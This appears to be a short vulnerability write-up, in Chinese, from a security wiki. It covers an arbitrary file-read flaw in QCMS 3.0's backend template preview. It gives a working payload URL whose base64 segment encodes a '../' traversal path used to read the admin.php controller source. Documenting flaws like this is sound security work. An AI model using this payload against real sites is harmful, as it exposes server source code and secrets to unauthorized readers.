menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right QCMS 3.0 任意文件读取 chevron_right QCMS 3.0 任意文件读取.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    QCMS 3.0 任意文件读取.md
    624 B / 2021-07-15 20:02:17
        QCMS 3.0 任意文件读取
=====================

一、漏洞简介
------------

二、漏洞影响
------------

QCMS 3.0

三、复现过程
------------

用seay扫了一下后发现的漏洞

漏洞在后台模板代码预览处,构造payload例如

    http://www.0-sec.org/backend/template/tempview/Li4vLi4vLi4vQ29udHJvbGxlci9hZG1pbi5waHA=.html

即可读取Controller文件下admin.php文件源码

![](./resource/QCMS3.0任意文件读取/media/rId24.png)

跟源码对比下,确实是读到了

![](./resource/QCMS3.0任意文件读取/media/rId25.png)

参考链接
--------

> https://xz.aliyun.com/t/7269
    links
    file_download